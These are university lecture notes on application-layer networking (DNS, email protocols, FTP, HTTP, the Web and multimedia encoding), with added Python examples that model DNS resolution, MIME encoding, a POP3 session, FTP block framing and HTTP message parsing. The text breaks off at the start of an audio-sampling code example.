Wolkite University
College of Computing & Informatics
Information Technology, Information System, Computer Science, Software Engineering

Data Communication and Computer Networks

Wendosen Z & Amare M

The Application Layer & Security
The Application Layer:
- receives services from the transport layer and provides services to users (humans or software)
- provides user interfaces and support services such as email, remote file access and transfer, and access to the WWW
- three general issues related to the application layer: the client-server paradigm, addressing, and services
8.1 The Client-Server Model
- to do a task, there must be a client and a server
- a computer runs a program either to request a service from another computer (client) or to provide a service to another computer (server)
- communication takes the form of the client process sending a message to the server process and then waiting for a reply
- a client program runs when needed, but the server program runs all the time
- Socket Interface: a set of system calls for communication between clients and servers
8.2 Addressing
- a client and a server communicate with each other using addresses
- the addressing mechanism in the application layer is different from the ones in other layers
  - email address: [email protected]
  - Web page (host name): http://www.ju.edu.et
- these are aliases convenient for human beings; they must be mapped to IP addresses
- an application program needs the services of another program for this; this application program is called DNS - Domain Name System
  - it uses port 53
  - it is not directly used by the user, but by application programs to perform the mapping
- originally (when the Internet was small), mapping was done using a host file with two columns stored on every host
- impossible nowadays
  - the host file is too large
  - updating all the host files in the world every time there is a change is difficult
- DNS
  - a hierarchical, domain-based naming scheme and a distributed database system for implementing the naming scheme
  - used for mapping host names and email addresses to IP addresses
- Name Space
  - names assigned to machines must be carefully selected from a name space; names must be unique (as are addresses)
  - a name space can be organized in two ways
- Flat Name Space
  - a name is a sequence of characters without structure; like human names? may be
  - difficult to use in a large system since it must be centrally controlled to avoid duplication
- Hierarchical Name Space
  - each name is made of several parts; the first may define the nature of the organization, the second the name, the third departments, ...
  - the authority to assign and control the name spaces can be decentralized, where a central authority assigns only the first two parts
- The DNS Name Space
  - hierarchical, defined in an inverted tree structure with the root at the top
  - the tree can have only 128 levels
- Label
  - each node has a label, a string with a maximum of 63 characters
  - the root label is null
  - children of a node must have different names (to guarantee uniqueness)
- Domain Name
  - each node has a domain name
  - a full domain name is a sequence of labels separated by dots (the last character is a dot; the null string is nothing)
  - case insensitive
  - domain names are read from the node up to the root
  - full path names must not exceed 255 characters
- Fully Qualified Domain Name (FQDN) or Absolute
  - terminated by a null string
  - contains the full name of a host, e.g., cs.aau.edu.et.
- Partially Qualified Domain Name (PQDN) or Relative
  - not terminated with a null string
  - it starts from a node but does not reach the root
  - used when the name to be resolved belongs to the same site as the client (the resolver supplies the missing part, called the suffix, to create an FQDN)
- Domain
  - a domain is a subtree of the domain name space
  - the name of the domain is the domain name of the node at the top of the subtree
- the Internet is divided into over 200 top-level domains, each partitioned into subdomains, ...; the leaves represent domains that have no subdomains; a leaf domain may contain a single host or represent a company and contain thousands of hosts
- Hierarchy of Name Servers
  - storing the information contained in the domain name space in a single computer is inefficient and unreliable
  - distribute the information among many computers called DNS servers
  - there is a hierarchy of name servers as we have a hierarchy of names
- Zone
  - what a server is responsible for, or has authority over, is called a zone; zones are nonoverlapping
  - the server makes a database called a zone file and keeps all the information for every node under that domain
  - it can divide its domain into subdomains and delegate part of its authority to other servers
- Root Server
  - a server whose zone consists of the whole tree
  - it usually does not store the whole information about domains but delegates its authority to other servers and keeps references to those servers
  - there are currently more than 13 root servers, each covering the whole domain name space and distributed all around the world
- Primary and Secondary Servers
  - a primary server is one that stores a file about the zone for which it is an authority; it is responsible for creating, maintaining, and updating the zone file
  - a secondary server is one that transfers the complete information about a zone from another server (primary or secondary); it does not create or update the file
  - such an arrangement creates redundancy so that if one server fails, the other can still serve clients
- Types of Top-Level Domains
  - two types: generic domains and country domains; there is a third one called Inverse Domain (used to map an address to a name; we will not discuss it further)
- Generic Domains
  - define registered hosts according to their generic behaviour

  Label   Description
  com     Commercial organizations
  edu     Educational institutions
  gov     Government institutions
  int     International organizations
  mil     Military groups
  net     Network support centers
  org     Nonprofit organizations
- newly introduced first-level domains

  Label    Description
  aero     Airlines and aerospace companies
  biz      Businesses or firms (similar to com)
  coop     Cooperative business organizations
  info     Information service providers
  museum   Museums and other nonprofit organizations
  name     Personal names (individuals)
  pro      Professional individual organizations

- Country Domains
  - include one entry for every country (as defined by ISO) - two-character abbreviations
- Resolution
  - mapping a name to an address or an address to a name is called name-address resolution
- Resolver
  - a host that needs to map an address to a name or a name to an address calls a DNS client named a resolver
  - the resolver accesses the closest DNS server with a mapping request
  - if the server has the information it satisfies the resolver; otherwise, it either refers the resolver to other servers (called Iterative Resolution) or asks other servers to provide the information (called Recursive Resolution)

[Figure: iterative resolution vs. recursive resolution]
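The name-space rules above (63-character labels, 255-character names, case insensitivity, PQDN plus suffix giving an FQDN) and the iterative resolution just described, as an added example that is not part of the lecture slides. The zone hierarchy, server names and the address in it are constructed for the example; nothing is looked up on the real Internet.

```python
"""Added example (not from the lecture): DNS name handling and iterative resolution.

Applies the name-space rules from the slides (labels of at most 63 characters,
names of at most 255 characters, case-insensitive matching, an FQDN ending in
the root's null label) and walks a small constructed server hierarchy the way
an iterative resolver does: ask the root, follow each referral, stop at an
answer. The zones, server names and the address are made up for the example.
"""

MAX_LABEL = 63
MAX_NAME = 255


def normalise(name: str) -> str:
    """DNS names are case insensitive; compare them in one case, as FQDNs."""
    name = name.strip().lower()
    return name if name.endswith(".") else name + "."


def qualify(name: str, suffix: str) -> str:
    """Resolver step for a PQDN: a name ending in a dot is already absolute;
    anything else gets the site suffix appended to make an FQDN."""
    if name.endswith("."):
        return normalise(name)
    return normalise(name + "." + suffix.strip("."))


def is_valid(fqdn: str) -> bool:
    """Length rules from the slides; also rejects empty labels such as 'a..b'."""
    if not fqdn.endswith(".") or len(fqdn) > MAX_NAME:
        return False
    labels = fqdn[:-1].split(".")
    return all(0 < len(label) <= MAX_LABEL for label in labels)


# Constructed hierarchy keyed by zone. Each server either holds answers ("A")
# for names in its zone or referrals ("NS") to the child zones it delegated.
SERVERS = {
    ".":           {"NS": ["et."]},
    "et.":         {"NS": ["edu.et."]},
    "edu.et.":     {"NS": ["aau.edu.et."]},
    "aau.edu.et.": {"A": {"cs.aau.edu.et.": "198.51.100.10"}},
}


def in_zone(fqdn: str, zone: str) -> bool:
    """True when fqdn is the zone apex or lies below it (label-aligned match)."""
    return fqdn == zone or fqdn.endswith("." + zone)


def referral(server: str, fqdn: str):
    """The most specific child zone this server can refer the resolver to."""
    children = [z for z in SERVERS[server].get("NS", []) if in_zone(fqdn, z)]
    return max(children, key=len) if children else None


def resolve_iteratively(name: str, suffix: str = "aau.edu.et", max_hops: int = 8):
    """Return (address or None, list of servers asked). The resolver itself
    follows referrals; no server asks another on its behalf."""
    fqdn = qualify(name, suffix)
    if not is_valid(fqdn):
        raise ValueError(f"malformed name {fqdn!r}")
    server, asked = ".", []
    for _ in range(max_hops):            # bounded: a referral loop must not hang us
        asked.append(server)
        answers = SERVERS[server].get("A", {})
        if fqdn in answers:
            return answers[fqdn], asked
        nxt = referral(server, fqdn)
        if nxt is None:
            return None, asked           # name does not exist below this server
        server = nxt
    raise RuntimeError("too many referrals")


if __name__ == "__main__":
    print(resolve_iteratively("cs"))              # PQDN; resolver adds the suffix
    print(resolve_iteratively("CS.aau.edu.et."))  # FQDN; case does not matter
```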

8.3 Application Layer Services
- electronic mail (SMTP, MIME, POP3, IMAP, Webmail)
- file transfer (FTP - File Transfer Protocol)
- HTTP - Hypertext Transfer Protocol for accessing data on the WWW
- WWW
- Multimedia
1. Electronic Mail
- what is email? a message that includes text, voice, video, or graphics and is sent to one or more recipients
- an email has an envelope and a message (similar to paper mail - snail mail)
- the envelope contains the sender's address, the receiver's address, and other information such as priority; information used for routing or transporting the email
- the message part consists of a header (information for the system) and a body (the actual information for the human recipient); envelope fields and header fields are confused in RFC 822 (Request for Comment)

[Figure: RFC 822 header fields]
[Figure: Example from my Gmail]
[Figure: Example from my JU Mail]
- many email systems exist; examples are Outlook, Eudora, Netscape, ...
- email systems consist of two subsystems: User Agent (UA) and Message Transfer Agent (MTA)

[Figure: User - UA - MTA - (SMTP) - MTA - (SMTP) - MTA - UA - User]
i. User Agent
- a user agent is software that
  - composes messages (by providing a template on the screen; some have built-in editors with more functionalities - spell and grammar checking, etc.; one can also use any other editor)
  - reads incoming messages (checks incoming mails in the mailbox, shows an on-line summary of each received mail - sender, size, date, flag fields, ...)
  - replies to messages (to the original sender or to all recipients)
  - forwards messages (to a third party)
  - handles mailboxes (inbox and outbox)
- a user agent can be command-driven or GUI-based
ii. Message Transfer Agent
- relays messages from the sender to the receiver
- it is a daemon running in the background
- to send mail, a system must have a client MTA; and to receive mail, a system must have a server MTA
- in the Internet, message transfer is done through a protocol (and software) named SMTP (Simple Mail Transfer Protocol); there were other protocols but they failed, e.g. the X.400 recommendation by CCITT
- SMTP uses port 25
- SMTP uses commands and responses to transfer messages between an MTA client and an MTA server
- originally, emails consisted of 7-bit ASCII text
- problems
  - cannot be used for languages that are not supported by 7-bit ASCII characters (French, German, Hebrew, ...)
  - cannot be used to send binary files, video or audio
- MIME - Multipurpose Internet Mail Extensions
  - MIME is a supplemental protocol that allows non-ASCII data to be sent using the existing mail programs and protocols; only the sending and receiving programs need to be changed
  - it transforms non-ASCII data at the sender site to ASCII and back to non-ASCII at the receiving site
- MIME defines five headers that can be added to the original SMTP header to define the transformation parameters
  - MIME-Version: the current version is 1.1
  - Content-Id: uniquely identifies the whole message in a multiple-message environment
  - Content-Description: defines whether the body is image, audio, or video
  - Content-Type: the type of data used in the body of the message
- Data types and subtypes

  Type         Subtype       Description
  Text         Plain         Unformatted text; no transformation needed
  Multipart    Mixed         Body contains ordered parts of different data types
               Parallel      Same as above, but no order
               Digest        Similar to mixed, but the default is message/RFC822
               Alternative   Parts are different versions of the same message
  Message      RFC822        Body is an encapsulated message
               Partial       Body is a fragment of a bigger message
               Ext. Body     Body is a reference to another message
  Image        JPEG          Image is in JPEG format
               GIF           Image is in GIF format
  Video        MPEG          Video is in MPEG format
  Audio        Basic         Audible sound
  Application  PostScript    Adobe PostScript printable document
               Octet-Stream  General binary data (8-bit bytes)
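The MIME transformation described above (binary data turned into ASCII at the sender, multipart/mixed body, and back to binary at the receiver), as an added example that is not from the lecture; it uses Python's standard email package, and the addresses and attachment bytes are constructed.

```python
"""Added example (not from the lecture): building and reading a MIME message.

Shows what the slides describe with Python's standard email package: a
multipart/mixed body whose text part needs no transformation and whose binary
attachment is transformed into ASCII (base64) so it survives 7-bit SMTP, then
the reverse transformation at the receiving site. Addresses and the sample
attachment bytes are constructed for the example.
"""
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

# Constructed sample: a few "binary" bytes standing in for an image file.
SAMPLE_IMAGE = bytes(range(0, 256, 8))


def build_message() -> EmailMessage:
    """Sender side: text part plus a non-ASCII (binary) part."""
    msg = EmailMessage(policy=policy.default)
    msg["From"] = "sender@example.com"
    msg["To"] = "recipient@example.com"
    msg["Subject"] = "MIME demo"
    msg.set_content("Plain text part; no transformation needed.")   # text/plain
    # Adding a non-text part turns the message into multipart/mixed and
    # base64-encodes the bytes so the serialised message is pure ASCII.
    msg.add_attachment(SAMPLE_IMAGE, maintype="image", subtype="jpeg",
                       filename="picture.jpg")
    return msg


def serialise(msg: EmailMessage) -> bytes:
    """Wire form, as the MTA sees it."""
    return msg.as_bytes()


def is_seven_bit(raw: bytes) -> bool:
    """The check an SMTP path without 8BITMIME effectively imposes."""
    return all(b < 128 for b in raw)


def read_message(raw: bytes) -> dict:
    """Receiving site: parse the ASCII form and undo the transformation."""
    parsed = BytesParser(policy=policy.default).parsebytes(raw)
    attachment = list(parsed.iter_attachments())[0]
    return {
        "mime_version": parsed["MIME-Version"],
        "content_type": parsed.get_content_type(),
        "text": parsed.get_body(preferencelist=("plain",)).get_content().strip(),
        "attachment_type": attachment.get_content_type(),
        "attachment_encoding": attachment["Content-Transfer-Encoding"],
        "attachment_bytes": attachment.get_content(),   # decoded back to binary
    }


if __name__ == "__main__":
    raw = serialise(build_message())
    print(raw.decode("ascii"))
    print(read_message(raw)["attachment_bytes"] == SAMPLE_IMAGE)
```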
- Mail Delivery
  - mail delivery consists of three stages
- Mail Access Protocols
  - the first and second stages of mail delivery use SMTP
  - SMTP is not involved in the third stage since SMTP is a push protocol; it pushes the message from the sender to the receiver
  - the operation of SMTP starts with the sender, not the receiver
  - but the third stage needs a pull protocol; the operation must start with the recipient; mail access protocols are required
  - there are two mail access protocols: POP3 and IMAP
- POP3 - Post Office Protocol, version 3
  - the client POP3 software is installed on the recipient machine; the server POP3 software is installed on the mail server
  - after establishing a TCP connection at port 110, the POP3 protocol goes through three stages
    - authorization: for the user to log in
    - transactions: reading emails, marking them for deletion, ...
    - update: committing deletions
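The three POP3 stages above as a server-side state machine, an added example that is not from the lecture. The command names and +OK/-ERR replies are the real POP3 ones; the mailbox contents and the password are constructed, and the point shown is that DELE only marks a message, so the deletion is committed in the UPDATE stage reached through QUIT and is discarded if the connection is lost first.

```python
"""Added example (not from the lecture): a minimal POP3 server state machine.

Models the three stages on the slides: AUTHORIZATION (USER/PASS), TRANSACTION
(LIST, RETR, DELE, RSET) and UPDATE (entered by QUIT, when marked messages are
actually removed). Command names and the +OK/-ERR replies follow POP3; the
mailbox contents and password are constructed for the example.
"""


class Pop3Session:
    def __init__(self, mailbox, password="s3cret"):
        self.mailbox = mailbox          # messages in the maildrop (edited in place)
        self.password = password
        self.state = "AUTHORIZATION"
        self.user = None
        self.marked = set()             # 1-based message numbers marked by DELE

    def handle(self, line: str) -> str:
        """Process one client command line and return the server reply."""
        verb, _, arg = line.strip().partition(" ")
        verb = verb.upper()
        if self.state == "AUTHORIZATION":
            return self._authorization(verb, arg)
        if self.state == "TRANSACTION":
            return self._transaction(verb, arg)
        return "-ERR session closed"

    def _authorization(self, verb, arg):
        if verb == "USER":
            self.user = arg
            return "+OK name is a valid mailbox"
        if verb == "PASS" and self.user is not None:
            if arg == self.password:
                self.state = "TRANSACTION"
                return f"+OK maildrop has {len(self.mailbox)} messages"
            self.user = None            # failed login: client starts over
            return "-ERR invalid password"
        if verb == "QUIT":
            self.state = "CLOSED"       # no UPDATE stage: nothing was marked
            return "+OK bye"
        return "-ERR not authenticated"

    def _transaction(self, verb, arg):
        live = [n for n in range(1, len(self.mailbox) + 1) if n not in self.marked]
        if verb == "LIST":
            return "+OK " + " ".join(f"{n}:{len(self.mailbox[n - 1])}" for n in live)
        if verb in ("RETR", "DELE"):
            try:
                n = int(arg)
            except ValueError:
                return "-ERR bad message number"
            if n not in live:
                return "-ERR no such message"
            if verb == "RETR":
                return "+OK\r\n" + self.mailbox[n - 1] + "\r\n."
            self.marked.add(n)          # only marked; removal happens in UPDATE
            return f"+OK message {n} deleted"
        if verb == "RSET":
            self.marked.clear()         # unmark everything
            return "+OK"
        if verb == "QUIT":
            return self._update()
        return "-ERR unknown command"

    def _update(self):
        """UPDATE stage: commit the deletions, then close the session."""
        self.mailbox[:] = [m for i, m in enumerate(self.mailbox, 1)
                           if i not in self.marked]
        self.marked.clear()
        self.state = "CLOSED"
        return "+OK maildrop updated"

    def drop_connection(self):
        """A connection lost before QUIT never reaches UPDATE: marks are discarded."""
        self.marked.clear()
        self.state = "CLOSED"
```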

- IMAP - Internet Mail Access Protocol
  - POP3 assumes that each time a client accesses the server, the whole mailbox will be cleared (transferred); not desirable if people access their mailboxes from different places such as a cybercafe
  - IMAP is similar to POP3 but with the following additional features
    - a user can check the email header prior to downloading
    - a user can search the contents of the email for a specific string
    - a user can partially download an email, e.g. without attachments
    - a user can create, delete, or rename mailboxes on the mail server (POP3 can do this only on the local machine)
    - a user can create a hierarchy of mailboxes in a folder for email storage
  - it uses port 143

[Figure: comparison of POP3 and IMAP]
- Web-Based Mail
  - some websites provide email service to anyone
  - examples are Yahoo and Hotmail
  - mail transfer from the user to the mail server and from the receiving server (the web server) to the user's browser is through HTTP
  - a TCP connection is still created using SMTP at port 25 before mail transfer begins
  - authentication is done by filling in a form
- other features provided by many systems independently of POP3 or IMAP
  - spam filtering
  - temporarily forwarding incoming mail to a different address
  - a vacation daemon: "Thanks, I am on vacation and will reply as soon as I am back."
2. FTP - File Transfer Protocol
- a standard mechanism provided by the Internet for copying a file from one host to another
- some heterogeneity problems solved by FTP: two systems may
  - use different file name conventions
  - have different ways to represent text and data
  - have different directory structures
- FTP establishes two connections between the client and the server (different from other client-server applications); one is used for data transfer, the other for control information (commands and responses)
- FTP uses the services of TCP; it needs two TCP connections; the well-known port 21 is used for the control connection, and the well-known port 20 is used for the data connection
- the client has three components and the server has two
- the control connection is maintained during the entire interactive FTP session; the data connection is opened and then closed for each file transferred
- two different approaches to communication; one each for the control connection and for data transfer
- Communication over the Control Connection
  - uses the same approach as SMTP - the ASCII character set
  - communication is achieved through commands and responses
  - each command or response is one short line (no worry about file format or structure)
- Communication over the Data Connection
  - to solve the heterogeneity problem, the client must define the type of file to be transferred, the structure of the data, and the transmission mode
- File Type: FTP can transfer one of the following file types
  - ASCII file: default format; the sender transforms from its own representation to ASCII and the receiver transforms from ASCII to its own representation
  - EBCDIC file: if one or both ends of the connection use EBCDIC encoding, the file can be transferred using EBCDIC encoding
  - Image file: the default format for transferring binary files; the file is sent as a continuous stream of bits without any interpretation or encoding
- Data Structure: one of the following interpretations of the structure of the data can be used
  - File Structure: default mode; the file has no structure; it is a continuous stream of bytes
  - Record Structure: the file is divided into records (or structs in C); can be used only with text files
  - Page Structure: the file is divided into pages, with each page having a page number and a page header; the pages can be stored or accessed randomly or sequentially
- Transmission Mode: it can use one of the following transmission modes
  - Stream mode: default mode; data are delivered from FTP to TCP as a continuous stream of bytes; TCP is responsible for chopping the data into segments of appropriate size
  - Block Mode: each block is preceded by a 3-byte header; the first byte is called the block descriptor; the next 2 bytes define the size of the block in bytes
  - Compressed Mode: if the file is big, the data can be compressed, normally using run-length encoding, where consecutive appearances of a data unit are replaced by one occurrence and the number of repetitions
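Block-mode framing from the list above (descriptor byte plus 2-byte length in front of each block), as an added example that is not from the lecture. The receiver-side parser shows the check a defender cares about: a length field that promises more bytes than the stream holds marks a truncated or malformed transfer rather than data. The EOF descriptor bit value is the RFC 959 one; the payload is constructed.

```python
"""Added example (not from the lecture): framing data in FTP block mode.

Each block carries the 3-byte header the slides describe: one descriptor byte
followed by a 2-byte (big-endian) byte count. The parser bounds-checks the
count before copying, so a header that overruns the stream is reported as an
incomplete transfer. The EOF descriptor bit is the RFC 959 value; the sample
payload is constructed for the example.
"""
import struct

HEADER = struct.Struct("!BH")     # descriptor (1 byte), block length (2 bytes)
EOF = 64                          # descriptor bit: this is the last block of the file
MAX_BLOCK = 0xFFFF                # largest count the 2-byte length field can hold


def frame(data: bytes, block_size: int = 1024) -> bytes:
    """Split data into blocks; the final block carries the EOF descriptor."""
    if not 0 < block_size <= MAX_BLOCK:
        raise ValueError("block size must fit in the 16-bit length field")
    chunks = [data[i:i + block_size] for i in range(0, len(data), block_size)] or [b""]
    out = bytearray()
    for idx, chunk in enumerate(chunks):
        descriptor = EOF if idx == len(chunks) - 1 else 0
        out += HEADER.pack(descriptor, len(chunk)) + chunk
    return bytes(out)


def parse(stream: bytes):
    """Return (payload, complete). complete is False when the stream ends before
    an EOF block or a header promises more bytes than remain (truncation)."""
    payload = bytearray()
    pos = 0
    while pos + HEADER.size <= len(stream):
        descriptor, length = HEADER.unpack_from(stream, pos)
        pos += HEADER.size
        if pos + length > len(stream):
            return bytes(payload), False        # length field overruns the data
        payload += stream[pos:pos + length]
        pos += length
        if descriptor & EOF:
            return bytes(payload), True
    return bytes(payload), False                 # ran out without an EOF block


if __name__ == "__main__":
    wire = frame(b"report " * 300, block_size=512)
    print(len(wire), parse(wire)[1])
```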
- User Interface
  - most operating systems provide a user interface to access the services of FTP
  - the interface prompts the user for the appropriate input; then it is changed to the corresponding FTP command
  - e.g. the user input is shown in blue (colour not preserved here); some of the commands are provided automatically by the interface; the user receives a prompt and provides only the arguments

    $ ftp networking.cs.ju.edu.et
    Connected to networking.cs.ju.edu.et
    220 Server ready
    Name: mulugeta
    Password: *******
    ftp > ls /usr/user/report
    200 OK
    150 Opening ASCII mode
    ...........
    ...........
    226 transfer complete
    ftp > close
    221 Goodbye
    ftp > quit
- Anonymous FTP
  - to use FTP, a user needs a user name and a password on the remote server
  - some sites have a set of files accessible to the public without the need to have a user name and a password
  - the user can use anonymous as a user name and guest as a password
3. HTTP - Hypertext Transfer Protocol
- a file transfer protocol specifically designed to facilitate access to the WWW
- it transfers data in the form of plain text, hypertext, audio, video, ...
- designed for an environment where there are rapid jumps from one document to another
- similar to FTP (but only one TCP connection, on well-known port 80) and SMTP (but differs in how messages are sent from the client to the server and from the server to the client)
- two kinds of messages: request and response
- Request Messages
  - consist of a request line, headers, and sometimes a body
  - the request line defines the request type, resource (URL), and HTTP version (currently 1.1)
- URL: a standard for specifying any kind of information on the Internet; it defines 4 things, e.g., http://www.aaustudents.com/hobbies.html
  - method: the protocol used to retrieve a document (ftp, http, ...)
  - host computer: the computer where the information is located; usually an alias name that begins with the characters www
  - port (optional): the port number of the server
  - path: of the file where the information is located
- request type or method: defines several kinds of messages; commands or requests a client issues to the server
  - GET: to retrieve a document
  - HEAD: when a client wants some information about the document (its header) but not the document itself
  - POST: to provide some input to the server - appending new data such as posting a message to a newsgroup or adding a file to a bulletin board
  - PUT: to provide a new or replacement document to the server - authentication required
  - PATCH: similar to PUT but the request contains a list of differences that should be implemented in the existing file
  - MOVE: to move a file to another location
  - DELETE: removes a page from a server - authentication required
  - LINK: create a link or links from a document to another location
  - UNLINK: delete a link
  - OPTION: to ask a server about available options
- Response Message
  - consists of a status line, headers, and sometimes a body
  - status line
    - HTTP version: same as above
    - Status code: a three-digit number specifying the status of a command; the first digit is used to divide the responses into 5 major groups
    - Status phrase: status code in text form
- Headers (for both types of messages)
  - to exchange additional information
  - e.g., the client can request a document to be sent in a special format
  - each header line consists of a header name and a header value
  - a header line belongs to one of 4 categories: general header, request header, response header, and entity header
    - General Header: gives general information about the message
    - Request Header: specifies the client's configuration and preferred document format
    - Response Header: specifies the server's configuration and special information about the request
    - Entity Header: information about the body of the document
- example 1
  - request message
    - to retrieve an image using the GET command with the path /usr/bin/image1
    - the request line shows the method, the URL, and the HTTP version
    - two header lines: the client specifying that it can accept images in GIF and JPEG formats
    - has no body
  - response message
    - contains the status line and four lines of header
    - the header lines define the date, server, MIME version, and length of the document
    - the body of the document follows the header
- example 2
  - request message
    - to retrieve information about an HTML document using the HEAD command
    - the request line shows the method, URL, and HTTP version
    - the header is one line showing that the client can accept the document in any format (wild card)
    - has no body
  - response message
    - contains the status line and five lines of header
    - the header lines define the date, server, MIME version, type of document, and length of the document
    - has no body
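The request and response messages of examples 1 and 2 in working form, as an added example that is not from the lecture: it composes the GET and HEAD requests (request line, header lines, blank line, no body), parses a response into status line, headers and body, groups the status code by its first digit, and checks the entity header Content-length against the body. The sample response, its server name and date are constructed.

```python
"""Added example (not from the lecture): the HTTP messages of the two slide examples.

Builds the GET and HEAD requests the slides describe (request line, header
lines, no body), parses a server response into status line, headers and body,
and classifies the status code into the five groups by its first digit. The
sample response, server name and date below are constructed.
"""

STATUS_GROUPS = {"1": "informational", "2": "success", "3": "redirection",
                 "4": "client error", "5": "server error"}


def build_request(method, url, headers, version="HTTP/1.1"):
    """headers is a list of (name, value) pairs so a name may repeat, as the
    two Accept lines of example 1 do. GET and HEAD carry no body."""
    lines = [f"{method} {url} {version}"]
    lines += [f"{name}: {value}" for name, value in headers]
    return "\r\n".join(lines) + "\r\n\r\n"      # blank line ends the header


def parse_response(raw):
    """Split a response into its status line, headers and (possibly empty) body."""
    head, _, body = raw.partition("\r\n\r\n")
    status_line, *header_lines = head.split("\r\n")
    parts = status_line.split(" ", 2)
    if len(parts) != 3 or len(parts[1]) != 3 or not parts[1].isdigit():
        raise ValueError(f"malformed status line {status_line!r}")
    version, code, phrase = parts
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if not sep or not name.strip():
            raise ValueError(f"malformed header line {line!r}")
        headers[name.strip().lower()] = value.strip()   # names are case insensitive
    return {"version": version, "code": int(code), "phrase": phrase,
            "group": STATUS_GROUPS.get(code[0], "unknown"),
            "headers": headers, "body": body}


def body_matches_length(resp):
    """Entity-header check: the body must be exactly Content-length bytes long."""
    declared = resp["headers"].get("content-length")
    return declared is None or int(declared) == len(resp["body"].encode())


# Constructed reply in the shape of example 1: status line, four header lines, body.
SAMPLE_RESPONSE = ("HTTP/1.1 200 OK\r\n"
                   "Date: Mon, 10 Jan 2000 13:15:14 GMT\r\n"
                   "Server: example-server/1.0\r\n"
                   "MIME-version: 1.0\r\n"
                   "Content-length: 9\r\n"
                   "\r\n"
                   "GIF89a...")


if __name__ == "__main__":
    print(build_request("GET", "/usr/bin/image1",
                        [("Accept", "image/gif"), ("Accept", "image/jpeg")]))
    print(parse_response(SAMPLE_RESPONSE)["group"])
```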
- Proxy Server
  - HTTP supports proxy servers
  - a computer that keeps copies of responses to recent requests
  - the HTTP client sends a request to the proxy server
  - the proxy server checks its cache; if the response is not stored in the cache, it sends the request to the corresponding server
  - the proxy server reduces the load on the original server, decreases traffic, and improves latency
4. WWW
- a repository of information spread all over the world and linked together; strings of text within a page that link to other documents are called hyperlinks
- it was initiated by CERN to create a system to handle distributed resources for scientific research (initial proposal by Tim Berners-Lee); W3C was formed in 1994 to further develop the Web (standardizing protocols and encouraging interoperability between sites); see www.w3.org
- WWW is a client-server service distributed over many locations called websites
- Hypertext and Hypermedia
  - hypertext: information is stored in a set of documents that are linked using the concept of pointers; such documents contain only text
  - hypermedia: documents can contain pictures, graphics, and sound
  - a unit of hypertext or hypermedia available on the Web is called a page; the main page for an organization or an individual is known as a homepage; a page is viewed with a program called a browser
- Browser Architecture
  - a lot of them exist, but all use nearly the same architecture
  - each consists of three parts: a controller, client programs, and interpreters
  - the controller receives input from the user and uses the client programs to access the document; after accessing the document, the controller uses one of the interpreters to display the document on the screen; the client programs can be one of the protocols such as HTTP, FTP, or SMTP; the interpreter can be HTML or Java (when Applets are used)
- Web documents can be grouped into 3 broad categories: static, dynamic, and active
- Static Documents
  - fixed-content documents created and stored in a server
  - the contents of the file are determined when the file is created, not when it is used; can be changed, but not by the user
- HTML - Hypertext Markup Language
  - a language for creating Web pages (that include text, graphics, and pointers to other Web pages)
  - a markup language allows formatting instructions to be embedded in the file itself and stored with the text (other markup languages: TeX and troff)
  - HTML lets us use only ASCII characters for both the main text and the formatting instructions (unlike WYSIWYG word processing programs); the latter are called tags (enclosed in < and > and usually come in pairs)
  - other markup languages: XML (eXtensible Markup Language), XSL (eXtensible Style Language), XHTML (eXtended HTML)
- Dynamic Documents
  - do not exist in a predefined format; instead a dynamic document is created by a Web server whenever a browser requests the document, for example, by filling in a form
  - the server runs an application program (or a script); the output of the program is sent to the user
- CGI - Common Gateway Interface
  - a technology that creates and handles dynamic documents
  - it is a set of standards that defines how a dynamic document should be written, how input data should be supplied to the program, and how the output result should be used
  - it is not a new language; instead it allows programmers to use any of several languages such as C, C++, Bourne or C Shell, Perl, ... by defining a set of rules and terms that the programmer should follow
  - a link for a dynamic document has the form: www.abc.com/cgi-bin/abc.perl
- other scripting languages include the following
  - PHP - Hypertext Processor
    - to embed little scripts inside HTML pages
    - www.abc.com/abc.php
  - JSP - JavaServer Pages
    - similar to PHP but the dynamic part is written in Java
    - www.abc.com/abc.jsp
  - ASP - Active Server Pages
    - Microsoft's version of PHP and JSP
    - it uses Visual Basic Script - Microsoft's proprietary scripting language - for the dynamic part
    - www.abc.com/abc.asp
- JavaScript
  - a full-blown high-level programming language
  - used when the interaction is with the user at the client computer, for designing interactive Web pages (e.g., to track mouse motion, so that something happens when the mouse is moved over some image or text: the image changes or a menu appears)
- Active Documents
  - for many applications, we need a program to be run at the client site; for example, to create animated graphics on the screen
  - these are called active documents
  - an active document is sent by a server in the form of byte code; the document is then run at the client (browser) site
- Applets
  - small Java programs that have been compiled into machine instructions for a virtual computer - JVM - Java Virtual Machine
  - since they are interpreted, the Java interpreter can prevent them from doing illegal things (at least in theory)
- ActiveX controls
  - Microsoft's version of Sun's Java applets
  - they are programs compiled to Pentium machine language and executed by the bare hardware
  - they are downloaded and executed by the browser (IE) - security issue
- Read about the wireless Web - for small portable devices
  - WAP - The Wireless Application Protocol
  - i-Mode - information mode
5. Multimedia
- two or more media (is a book multimedia?)
- the combination of text, graphics, images, video and audio used together; at least one must be continuous (time-dependent like audio, video, animation)
- sometimes pure audio (or video) is referred to as multimedia
- Multimedia System
  - the integrated production, processing, storage, representation, and transmission of several time-dependent and time-independent media streams
- Audio (sound) wave
  - an audio (sound) wave is a one-dimensional acoustic (pressure) wave
  - causes vibration in the eardrum or in a microphone
  - frequency range of the human ear: 20 - 20,000 Hz (20 KHz)
  - audio waves can be converted to digital form by an ADC - Analog Digital Converter
- Analog Digital Conversion (ADC)
  - Sampling: of the audio wave every ∆T secs
  - Quantization
    - precision of the digital sample depends on the number of bits
    - quantization noise: error due to the finite number of bits/sample
  - audio encoding - example

[Figure: a) a sine wave; b) sampling the sine wave; c) quantizing the samples to 4 bits]
- audio encoding - standards
  - telephone
    - 8,000 samples/sec (up to 4 KHz)
    - needs 64 Kbps (Pulse Code Modulation - PCM, 8-bit samples in Europe), or 56 Kbps (USA, Japan - 7 bits)
  - audio CDs
    - 44,100 samples/sec (up to 20 KHz)
    - 16-bit samples: quantization error is small but audible
    - needs 705.6 Kbps (44100x16) for mono, 1.411 Mbps for stereo
  - MP3 (MPEG-1 audio layer 3) compression
    - based on psychoacoustic models (128 Kbps)
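The sampling and quantization steps of the ADC slide and the PCM bit rates just listed, carried through numerically as an added example that is not from the lecture: a sine wave is sampled every 1/rate seconds, quantized to n bits, the quantization noise is measured (it falls as bits are added), and the bit-rate helper reproduces the 64 Kbps telephone and 705.6 Kbps mono CD figures. All values are computed, not measured.

```python
"""Added example (not from the lecture): sampling and quantizing a sine wave.

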